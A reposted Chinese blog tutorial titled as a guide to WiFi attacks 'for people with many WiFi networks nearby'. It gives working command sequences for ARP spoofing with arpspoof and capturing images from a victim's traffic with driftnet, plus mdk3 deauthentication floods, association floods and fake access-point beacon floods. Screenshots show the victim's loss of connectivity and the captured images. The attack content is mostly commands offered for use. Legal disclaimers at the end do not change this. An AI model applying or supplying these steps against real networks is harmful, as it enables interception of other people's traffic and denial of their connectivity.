wifi攻击的几种方式,非常适合附近wifi多的人参考

admin 2022年1月17日00:39:42移动安全评论165 views1956字阅读6分31秒阅读模式

局域网arp攻击,获取对方浏览网页

用到的命令

arpspoof -i eth0 -t 192.168.1.103 192.168.1.1            网卡     靶机             网关 echo 0  > /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/ip_forward driftnet -i eth0

攻击前 靶机可以正常上网

wifi攻击的几种方式,非常适合附近wifi多的人参考

输入命令开始攻击  arpspoof -i eth0 -t 192.168.1.103 192.168.1.1   这个时候刷新网页一直转圈圈  主机已经断网

wifi攻击的几种方式,非常适合附近wifi多的人参考

wifi攻击的几种方式,非常适合附近wifi多的人参考

随后开始流量转发   echo 1 > /proc/sys/net/ipv4/ip_forward    意思为将 1写入 /proc/sys/net/ipv4/ip_forward 文件,开启流量转发,这个时候流量会经过kali在到主机,主机已经 能正常上网  echo 0 > /proc/sys/net/ipv4/ip_forward  意思为将 0写入 /proc/sys/net/ipv4/ip_forward 文件,关闭流量转发,主机不能正常上网

wifi攻击的几种方式,非常适合附近wifi多的人参考

wifi攻击的几种方式,非常适合附近wifi多的人参考

输入 driftnet -i eth0 获取当前网卡流量  这个时候如果主机流量http网站,就能截取图片

wifi攻击的几种方式,非常适合附近wifi多的人参考

主机浏览网站

wifi攻击的几种方式,非常适合附近wifi多的人参考

kali截取的图片

wifi攻击的几种方式,非常适合附近wifi多的人参考

mdk3实施的Deauth Flood攻击

1.1Deauthentication/Disassociation Amok:(强制解除验证解除连接)

使用mdk3实施的Deauth Flood攻击,即取消验证洪水攻击,
准备一个无线网卡,连接到kali,进行wifi嗅探
输入ifconfig,查看是否挂载成功

wifi攻击的几种方式,非常适合附近wifi多的人参考

出现wlan0即为挂载成功
输入airmon-ng start wlan0,调为监听模式 wlan0为网卡名字
使用airodump-ng wlan0mon 查看周围无线路由器情况

wifi攻击的几种方式,非常适合附近wifi多的人参考

记录受害者的BSSID,CH
开始攻击:mdk3 wlan0mon d -c 10 攻击指定的频道

mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2]

其中各参数详情:
d:表示的是deauthentication/disassociation攻击模式
-c:针对的是无线网络工作频道,这里选择为10,我的测试路由器为“叫爸爸告诉你密码”
-w:file白名单模式,w就是白名单的简写,即后跟文件中包含AP的MAC会在攻击中回避
-b:file黑名单模式,b就是黑名单的简写,即后跟预攻击目标AP的MAC列表
此时我输入mdk3 wlan0mon d -c 10

wifi攻击的几种方式,非常适合附近wifi多的人参考

虽然看起来没什么反应,但实际上我的手机已经连接不上wifi了
注意:这里的攻击不对网线连接的客户端起作用,仅仅是对无线设备管用,而且只能是范围比较近的路由器起作用,

wifi攻击的几种方式,非常适合附近wifi多的人参考

2、Association Flood攻击,关联洪水攻击。

在无线路由器或者接入点内置一个列表即为连接状态表,里面可显示出所有与该AP建立连接的无线客户端状态。它试图通过利用大量模仿和伪造的无线客户端关联来填充AP的客户端关联表,从而达到淹没AP的目的。
由于开放身份验证(空身份验证)允许任何客户端通过身份验证后关联。利用这种漏洞的攻击者可以通过创建多个到达已连接或已关联的客户端来模仿很多客户端,从而淹没目标AP的客户端关联表。
攻击步骤:
刚开始和以上都一样,就最后一点不一样,刚刚是mdk3 wlan0mon d -c 10
10为信道,d为deauth攻击模式,-c为指定信道
在是mdk3 wlan0mon a -a 32:69:A2:60:EE:48
攻击参数变为了路由器mac地址

wifi攻击的几种方式,非常适合附近wifi多的人参考

wifi攻击的几种方式,非常适合附近wifi多的人参考

这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在reaver穷据路由PIN码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由,对于有些路由器防DOS的这个不好用。

另一种用法

创建假wifi
mdk3 wlan0mon b -n 9999999999999 创建一个9999999999999 的wifi

wifi攻击的几种方式,非常适合附近wifi多的人参考

wifi攻击的几种方式,非常适合附近wifi多的人参考

还可以用来表白
mdk3 wlan0mon b -f test.txt -c 6 -s 1000
创建自定义文本里的wifi
文本自定义

wifi攻击的几种方式,非常适合附近wifi多的人参考

wifi攻击的几种方式,非常适合附近wifi多的人参考

本文最终解释权归本文作者所有!!!

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何法律责任。

一切法律后果均由攻击者承担!!!

日站不规范,亲人两行泪!!!

不规范,亲人两行泪!

不规范,亲人两行泪!

  • 专注于信息安全方面分享,非营利性组织,不接商业广告

  • 关注不迷路,点赞!关注!转发!评论!!

  • 要投稿的后台留言即可,会第一时间回复,谢谢!

wifi攻击的几种方式,非常适合附近wifi多的人参考

原文始发于微信公众号(每天一个入狱小技巧):wifi攻击的几种方式,非常适合附近wifi多的人参考

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月17日00:39:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  wifi攻击的几种方式,非常适合附近wifi多的人参考 https://cn-sec.com/archives/739877.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: